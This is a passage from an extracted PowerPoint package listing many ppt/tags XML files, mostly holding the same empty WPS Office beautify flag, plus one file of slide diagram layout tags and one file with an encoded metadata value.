  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag402.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag403.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag404.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag405.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag406.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag407.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag408.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag409.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag41.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag410.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag411.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag412.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag413.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag414.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag415.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag416.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag417.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag418.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag419.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag421.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag422.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag423.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag424.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag425.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag426.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag427.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag428.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag429.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag430.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag431.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag432.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag433.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag434.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag435.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag436.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag437.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag438.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag439.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag440.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag441.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag442.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag443.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag444.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag445.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag446.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag447.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag448.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag449.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag450.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag451.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag452.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag453.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag454.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag455.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag456.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag457.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag458.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag459.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag460.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag461.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag462.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag463.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag464.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag465.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag466.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag467.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag468.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag469.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag47.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag470.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag471.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag472.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag473.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag474.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_SPECIAL_SOURCE" val="bdnull"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="diagram20227964_3"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_MASTER_TYPE" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_COLOR_TYPE" val="0"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="3"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227964"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="diag"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="3"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="913.55*403"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="0*66.25"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_SLIDE_DIAGTYPE" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag475.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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49.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag51.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag52.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5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55.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag56.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag57.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag58.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6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1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag62.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag64.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag65.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6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7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag68.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag69.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag71.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7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3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag74.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag75.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag78.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79.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag81.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
